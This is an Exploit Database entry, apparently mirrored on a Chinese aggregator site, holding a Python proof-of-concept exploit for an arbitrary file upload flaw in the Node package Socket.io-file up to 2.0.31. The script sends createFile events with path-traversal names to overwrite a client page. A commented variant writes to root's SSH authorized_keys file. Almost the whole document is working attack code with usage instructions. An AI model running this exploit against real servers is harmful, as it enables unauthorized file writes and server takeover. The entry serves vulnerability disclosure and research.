Socket.io-file 2.0.31 – Arbitrary File Upload

• Exploit Database
• 17 阅读

• 作者： Cr0wTom
  日期： 2020-07-26
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/48713/

• # Exploit Title: Socket.io-file 2.0.31 - Arbitrary File Upload
  # Date: 2020-07-02
  # Exploit Author: Cr0wTom
  # Vendor Homepage: https://www.npmjs.com/package/socket.io-file
  # Software Link: https://www.npmjs.com/package/socket.io-file/v/2.0.31
  # Version: <= v2.0.31
  # Tested on: node v10.19.0, Socket.io-file v2.0.31, socket.io v2.3.0
  # CVE: -
  
  # Requirements: pip install socketIO-client-nexus==0.7.6
  
  #!/usr/bin/env python
  
  import sys
  import json
  import os
  from socketIO_client_nexus import SocketIO, LoggingNamespace
  
  def file_creation(RHOST, RPORT):
  print ('Initiating connection...')
  with SocketIO(RHOST, RPORT, LoggingNamespace) as socketIO:
  
  print ('Creating file...')
  
  # Example server running in /home/testuser/Documents/socket-app so customize the path appropriately 
  # Change the "name" option if you want to create an other file in an different path of the system
  socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../client/index.html","size":1,"chunkSize":10240,"sent":0,"data":{}})
  
  # Example for server running with root access:
  # socketIO.emit("socket.io-file::createFile",{"id":"u_0","name":"../../../../../root/.ssh/authorized_keys","size":1,"chunkSize":10240,"sent":0,"data":{}})
  
  print ('Writing data to file...')
  
  # Add the data you want to get written to the file
  data = "Exploited by Cr0wTom"
  json_string = json.dumps(data)
  socketIO.once("socket.io-file::request::u_0", on_aaa_response)
  socketIO.emit("socket.io-file::stream::u_0", json_string)
  
  def on_aaa_response(*args):
  print('on_aaa_response', args)
  
  def print_usage():
  print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
  print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
  print ('Usage: python3 exploit.py <RHOST> <RPORT>')
  print ('RHOSTThe target host IP address or domain.')
  print ('RPORTThe target host port number of the nodejs server.')
  
  if __name__ == '__main__':
  
  # ensure we have at least an IP and Port
  if len(sys.argv) < 3:
  print_usage()
  sys.exit(1)
  
  print ('Socket.io-file <= 2.0.31 - Improper Input Validation in File Upload Functionality')
  print ('Exploit Author: Cr0wTom (https://cr0wsplace.com)\n')
  file_creation(sys.argv[1], sys.argv[2])